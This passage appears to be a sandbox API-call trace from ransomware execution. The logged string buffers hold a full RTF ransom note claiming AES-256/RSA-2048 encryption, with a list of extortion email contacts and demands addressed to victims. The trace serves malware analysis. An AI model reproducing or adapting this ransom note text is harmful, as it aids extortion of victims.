!\\PAR\r\nW\\F1\\LANG1049\\'E5\\F0\\LANG1033 \\F1\\LANG1049\\'E0\\F0\\LANG1033 R\\F1\\LANG1049\\'E5\\F0\\LANG1033 ALW\\F1\\LANG1049\\'E0\\'F3\\F0\\LANG1033 S \\F1\\LANG1049\\'EE\\F0\\LANG1033 P\\F1\\LANG1049\\'E5\\F0\\LANG1033 N\\F1\\LANG1049\\'E5\\F0\\LANG1033 D F\\F1\\LANG1049\\'EE\\F0\\LANG1033 R DI\\F1\\LANG1049\\'E0\\F0\\LANG1033 L\\F1\\LANG1049\\'EE\\F0\\LANG1033 G \\F1\\LANG1049\\'E0\\F0\\LANG1033 ND R\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 DY T\\F1\\LANG1049\\'EE\\F0\\LANG1033 H\\F1\\LANG1049\\'E5\\F0\\LANG1033 LP \\F1\\LANG1049\\'F3\\'EE\\F0\\LANG1033 U.\\PAR\r\n\\CF2\\FS28 [RDM_STR]\\CF0\\F1\\FS32\\LANG1049\\PAR\r\n}\r\n") returned 0x1c45 [0064.343] CharUpperBuffW (in: lpsz="[BIT_MSG]", cchLength=0x9 | out: lpsz="[BIT_MSG]") returned 0x9 [0064.344] CharUpperBuffW (in: lpsz="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 [KID]\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 [RDM_STR]\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchLength=0x1c45 | out: lpsz="{\\RTF1\\ANSI\\ANSICPG1251\\DEFF0\\NOUICOMPAT\\DEFLANG1049{\\FONTTBL{\\F0\\FNIL\\FCHARSET0 CALIBRI;}{\\F1\\FNIL\\FCHARSET204 CALIBRI;}}\r\n{\\COLORTBL ;\\RED255\\GREEN0\\BLUE0;\\RED255\\GREEN255\\BLUE255;}\r\n{\\*\\GENERATOR RICHED20 10.0.15063}\\VIEWKIND4\\UC1 \r\n\\PARD\\RI-74\\SL240\\SLMULT1\\QC\\TX8378\\B\\F0\\FS24\\LANG1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\PAR\r\n\r\n\\PARD\\RI-74\\SL240\\SLMULT1\\TX8378\\PAR\r\n\\B0 ALL Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 UR FIL\\F1\\LANG1049\\'E5\\F0\\LANG1033 S W\\F1\\LANG1049\\'E5\\F0\\LANG1033 R\\F1\\LANG1049\\'E5\\F0\\LANG1033 \\F1\\LANG1049\\'E5\\F0\\LANG1033 N\\F1\\LANG1049\\'F1\\F0\\LANG1033 R\\F1\\LANG1049\\'F3\\F0\\LANG1033 PT\\F1\\LANG1049\\'E5\\F0\\LANG1033 D WITH STR\\F1\\LANG1049\\'EE\\F0\\LANG1033 NG CR\\F1\\LANG1049\\'F3\\F0\\LANG1033 PT\\F1\\LANG1049\\'EE\\F0\\LANG1033 \\F1\\LANG1049\\'E0\\F0\\LANG1033 LG\\F1\\LANG1049\\'EE\\F0\\LANG1033 RITHM \\F1\\LANG1049\\'C0\\'C5\\F0\\LANG1033 S-256 + RS\\F1\\LANG1049\\'C0\\F0\\LANG1033 -2048.\\PAR\r\nPL\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 B\\F1\\LANG1049\\'E5\\F0\\LANG1033 SUR\\F1\\LANG1049\\'E5\\F0\\LANG1033 TH\\F1\\LANG1049\\'E0\\F0\\LANG1033 T Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 UR FIL\\F1\\LANG1049\\'E5\\F0\\LANG1033 S \\F1\\LANG1049\\'E0\\F0\\LANG1033 R\\F1\\LANG1049\\'E5\\F0\\LANG1033 N\\F1\\LANG1049\\'EE\\F0\\LANG1033 T BR\\F1\\LANG1049\\'EE\\F0\\LANG1033 K\\F1\\LANG1049\\'E5\\F0\\LANG1033 N \\F1\\LANG1049\\'E0\\F0\\LANG1033 ND \\F1\\LANG1049\\'F3\\'EE\\F0\\LANG1033 U C\\F1\\LANG1049\\'E0\\F0\\LANG1033 N R\\F1\\LANG1049\\'E5\\F0\\LANG1033 ST\\F1\\LANG1049\\'EE\\F0\\LANG1033 R\\F1\\LANG1049\\'E5\\F0\\LANG1033 TH\\F1\\LANG1049\\'E5\\F0\\LANG1033 M T\\F1\\LANG1049\\'EE\\F0\\LANG1033 D\\F1\\LANG1049\\'E0\\F0\\LANG1033 Y.\\PAR\r\n\\PAR\r\nIF Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 U R\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 LL\\F1\\LANG1049\\'F3\\F0\\LANG1033 W\\F1\\LANG1049\\'E0\\F0\\LANG1033 NT T\\F1\\LANG1049\\'EE\\F0\\LANG1033 R\\F1\\LANG1049\\'E5\\F0\\LANG1033 ST\\F1\\LANG1049\\'EE\\F0\\LANG1033 R\\F1\\LANG1049\\'E5\\F0\\LANG1033 Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 UR FIL\\F1\\LANG1049\\'E5\\F0\\LANG1033 S PL\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 WRIT\\F1\\LANG1049\\'E5\\F0\\LANG1033 US T\\F1\\LANG1049\\'EE\\F0\\LANG1033 TH\\F1\\LANG1049\\'E5\\F0\\LANG1033 \\F1\\LANG1049\\'E5\\F0\\LANG1033 -M\\F1\\LANG1049\\'E0\\F0\\LANG1033 ILS:\\PAR\r\n\\B\\FS28 BOBGREEN85@CRIPTEXT.COM\\PAR\r\nBOBGREEN85@AOL.COM\\PAR\r\nBOBGREEN85@TUTANOTA.COM\\PAR\r\n\\B0\\FS24 IN SUBJ\\F1\\LANG1049\\'E5\\F0\\LANG1033 CT LIN\\F1\\LANG1049\\'E5\\F0\\LANG1033 WRIT\\F1\\LANG1049\\'E5\\F0\\LANG1033 \\F1\\LANG1049\\'F3\\'EE\\F0\\LANG1033 UR ID: \\B\\FS28 [KID]\\FS24\\PAR\r\n\\PAR\r\n\\CF1 IMP\\F1\\LANG1049\\'EE\\F0\\LANG1033 RT\\F1\\LANG1049\\'E0\\F0\\LANG1033 NT!\\CF0 PL\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 ND Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 UR M\\F1\\LANG1049\\'E5\\F0\\LANG1033 SS\\F1\\LANG1049\\'E0\\F0\\LANG1033 G\\F1\\LANG1049\\'E5\\F0\\LANG1033 T\\F1\\LANG1049\\'EE\\F0\\LANG1033 \\F1\\LANG1049\\'E0\\F0\\LANG1033 LL \\F1\\LANG1049\\'EE\\F0\\LANG1033 F \\F1\\LANG1049\\'EE\\F0\\LANG1033 UR 3 \\F1\\LANG1049\\'E5\\F0\\LANG1033 -M\\F1\\LANG1049\\'E0\\F0\\LANG1033 IL \\F1\\LANG1049\\'E0\\F0\\LANG1033 DDR\\F1\\LANG1049\\'E5\\F0\\LANG1033 SS\\F1\\LANG1049\\'E5\\F0\\LANG1033 S. THIS IS R\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 LL\\F1\\LANG1049\\'F3\\F0\\LANG1033 IMP\\F1\\LANG1049\\'EE\\F0\\LANG1033 RT\\F1\\LANG1049\\'E0\\F0\\LANG1033 NT B\\F1\\LANG1049\\'E5\\F0\\LANG1033 C\\F1\\LANG1049\\'E0\\F0\\LANG1033 US\\F1\\LANG1049\\'E5\\F0\\LANG1033 \\F1\\LANG1049\\'EE\\F0\\LANG1033 F D\\F1\\LANG1049\\'E5\\F0\\LANG1033 LIV\\F1\\LANG1049\\'E5\\F0\\LANG1033 R\\F1\\LANG1049\\'F3\\F0\\LANG1033 PR\\F1\\LANG1049\\'EE\\F0\\LANG1033 BL\\F1\\LANG1049\\'E5\\F0\\LANG1033 MS \\F1\\LANG1049\\'EE\\F0\\LANG1033 F S\\F1\\LANG1049\\'EE\\F0\\LANG1033 M\\F1\\LANG1049\\'E5\\F0\\LANG1033 M\\F1\\LANG1049\\'E0\\F0\\LANG1033 IL S\\F1\\LANG1049\\'E5\\F0\\LANG1033 RVI\\F1\\LANG1049\\'F1\\'E5\\F0\\LANG1033 S!\\PAR\r\n\\CF1 IMPORTANT!\\CF0 IF YOU HAVEN'T RECEIVED A RESPONSE FROM US WITHIN 24 HOURS, PLEASE TRY TO USE A DIFFERENT EMAIL SERVICE\\F1\\LANG1049 (\\F0\\LANG1033 GMAIL, YAHOO, AOL, ETC\\F1\\LANG1049 )\\F0\\LANG1033 .\\PAR\r\n\\CF1 IMPORTANT!\\CF0 PLEASE CHECK YOUR SPAM FOLDER EACH TIME YOU WAIT FOR OUR RESPONSE! IF YOU FIND OUR EMAIL IN THE SPAM FOLDER PLEASE MOVE IT TO YOUR INBOX.\\PAR\r\n\\CF1 IMPORTANT! \\CF0 WE ARE ALWAYS IN TOUCH AND READY TO HELP YOU AS SOON AS POSSIBLE!\\PAR\r\n\\PAR\r\n\\B0\\F1\\LANG1049\\'C0\\F0\\LANG1033 TT\\F1\\LANG1049\\'E0\\F0\\LANG1033 CH UP T\\F1\\LANG1049\\'EE\\F0\\LANG1033 3 SM\\F1\\LANG1049\\'E0\\F0\\LANG1033 LL \\F1\\LANG1049\\'E5\\F0\\LANG1033 NCR\\F1\\LANG1049\\'F3\\F0\\LANG1033 PT\\F1\\LANG1049\\'E5\\F0\\LANG1033 D FIL\\F1\\LANG1049\\'E5\\F0\\LANG1033 S F\\F1\\LANG1049\\'EE\\F0\\LANG1033 R FR\\F1\\LANG1049\\'E5\\'E5\\F0\\LANG1033 T\\F1\\LANG1049\\'E5\\F0\\LANG1033 ST D\\F1\\LANG1049\\'E5\\'F1\\F0\\LANG1033 RYPTION. PL\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 N\\F1\\LANG1049\\'EE\\F0\\LANG1033 TE TH\\F1\\LANG1049\\'E0\\F0\\LANG1033 T TH\\F1\\LANG1049\\'E5\\F0\\LANG1033 FIL\\F1\\LANG1049\\'E5\\F0\\LANG1033 S Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 U S\\F1\\LANG1049\\'E5\\F0\\LANG1033 ND US SH\\F1\\LANG1049\\'EE\\F0\\LANG1033 ULD N\\F1\\LANG1049\\'EE\\F0\\LANG1033 T C\\F1\\LANG1049\\'EE\\F0\\LANG1033 NT\\F1\\LANG1049\\'E0\\F0\\LANG1033 IN \\F1\\LANG1049\\'E0\\F0\\LANG1033 N\\F1\\LANG1049\\'F3\\F0\\LANG1033 V\\F1\\LANG1049\\'E0\\F0\\LANG1033 LU\\F1\\LANG1049\\'E0\\F0\\LANG1033 BL\\F1\\LANG1049\\'E5\\F0\\LANG1033 INF\\F1\\LANG1049\\'EE\\F0\\LANG1033 RM\\F1\\LANG1049\\'E0\\F0\\LANG1033 TI\\F1\\LANG1049\\'EE\\F0\\LANG1033 N.\\F1\\LANG1049 \\F0\\LANG1033 W\\F1\\LANG1049\\'E5\\F0\\LANG1033 WILL S\\F1\\LANG1049\\'E5\\F0\\LANG1033 ND Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 U T\\F1\\LANG1049\\'E5\\F0\\LANG1033 ST D\\F1\\LANG1049\\'E5\\F0\\LANG1033 CR\\F1\\LANG1049\\'F3\\F0\\LANG1033 PT\\F1\\LANG1049\\'E5\\F0\\LANG1033 D FILES IN \\F1\\LANG1049\\'EE\\F0\\LANG1033 UR R\\F1\\LANG1049\\'E5\\F0\\LANG1033 SP\\F1\\LANG1049\\'EE\\F0\\LANG1033 NS\\F1\\LANG1049\\'E5\\F0\\LANG1033 F\\F1\\LANG1049\\'EE\\F0\\LANG1033 R Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 UR C\\F1\\LANG1049\\'EE\\F0\\LANG1033 NFID\\F1\\LANG1049\\'E5\\F0\\LANG1033 N\\F1\\LANG1049\\'F1\\'E5\\F0\\LANG1033 .\\PAR\r\nOF COURSE YOU WILL RECEIVE ALL THE NECESSARY INSTRUCTIONS H\\F1\\LANG1049\\'EE\\F0\\LANG1033 W T\\F1\\LANG1049\\'EE\\F0\\LANG1033 D\\F1\\LANG1049\\'E5\\F0\\LANG1033 CR\\F1\\LANG1049\\'F3\\F0\\LANG1033 PT Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 UR FIL\\F1\\LANG1049\\'E5\\F0\\LANG1033 S!\\PAR\r\n\\PAR\r\n\\CF1\\B IMPORTANT!\\PAR\r\n\\CF0 PL\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 N\\F1\\LANG1049\\'EE\\F0\\LANG1033 TE THAT WE ARE PROFESSIONALS AND JUST DOING OUR JOB!\\PAR\r\nPLEASE D\\F1\\LANG1049\\'EE\\F0\\LANG1033 N\\F1\\LANG1049\\'EE\\F0\\LANG1033 T W\\F1\\LANG1049\\'E0\\F0\\LANG1033 ST\\F1\\LANG1049\\'E5\\F0\\LANG1033 TH\\F1\\LANG1049\\'E5\\F0\\LANG1033 TIM\\F1\\LANG1049\\'E5\\F0\\LANG1033 \\F1\\LANG1049\\'E0\\F0\\LANG1033 ND D\\F1\\LANG1049\\'EE\\F0\\LANG1033 N\\F1\\LANG1049\\'EE\\F0\\LANG1033 T TR\\F1\\LANG1049\\'F3\\F0\\LANG1033 TO D\\F1\\LANG1049\\'E5\\'F1\\'E5\\F0\\LANG1033 IVE US - IT WILL R\\F1\\LANG1049\\'E5\\F0\\LANG1033 SULT \\F1\\LANG1049\\'EE\\F0\\LANG1033 NLY PRI\\F1\\LANG1049\\'F1\\'E5\\F0\\LANG1033 INCR\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 !\\PAR\r\nW\\F1\\LANG1049\\'E5\\F0\\LANG1033 \\F1\\LANG1049\\'E0\\F0\\LANG1033 R\\F1\\LANG1049\\'E5\\F0\\LANG1033 ALW\\F1\\LANG1049\\'E0\\'F3\\F0\\LANG1033 S \\F1\\LANG1049\\'EE\\F0\\LANG1033 P\\F1\\LANG1049\\'E5\\F0\\LANG1033 N\\F1\\LANG1049\\'E5\\F0\\LANG1033 D F\\F1\\LANG1049\\'EE\\F0\\LANG1033 R DI\\F1\\LANG1049\\'E0\\F0\\LANG1033 L\\F1\\LANG1049\\'EE\\F0\\LANG1033 G \\F1\\LANG1049\\'E0\\F0\\LANG1033 ND R\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 DY T\\F1\\LANG1049\\'EE\\F0\\LANG1033 H\\F1\\LANG1049\\'E5\\F0\\LANG1033 LP \\F1\\LANG1049\\'F3\\'EE\\F0\\LANG1033 U.\\PAR\r\n\\CF2\\FS28 [RDM_STR]\\CF0\\F1\\FS32\\LANG1049\\PAR\r\n}\r\n") returned 0x1c45 [0064.344] CharUpperBuffW (in: lpsz="[KID]", cchLength=0x5 | out: lpsz="[KID]") returned 0x5 [0064.344] GetTickCount () returned 0x1149500 [0064.344] QueryPerformanceCounter (in: lpPerformanceCount=0x395fe2c | out: lpPerformanceCount=0x395fe2c*=18468295527) returned 1 [0064.344] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x395fe08, cbMultiByte=1, lpWideCharStr=0x395edf0, cchWideChar=2047 | out: lpWideCharStr="u") returned 1 [0064.344] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x395fe08, cbMultiByte=1, lpWideCharStr=0x395edf0, cchWideChar=2047 | out: lpWideCharStr="q") returned 1 [0064.344] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x395fe08, cbMultiByte=1, lpWideCharStr=0x395edf0, cchWideChar=2047 | out: lpWideCharStr="p") returned 1 [0064.344] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x395fe08, cbMultiByte=1, lpWideCharStr=0x395edf0, cchWideChar=2047 | out: lpWideCharStr="w") returned 1 [0064.344] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x395fe08, cbMultiByte=1, lpWideCharStr=0x395edf0, cchWideChar=2047 | out: lpWideCharStr="e") returned 1 [0064.344] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x395fe08, cbMultiByte=1, lpWideCharStr=0x395edf0, cchWideChar=2047 | out: lpWideCharStr="o") returned 1 [0064.345] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x395fe08, cbMultiByte=1, lpWideCharStr=0x395edf0, cchWideChar=2047 | out: lpWideCharStr="3") returned 1 [0064.345] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x395fe08, cbMultiByte=1, lpWideCharStr=0x395edf0, cchWideChar=2047 | out: lpWideCharStr="8") returned 1 [0064.345] CharUpperBuffW (in: lpsz="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur 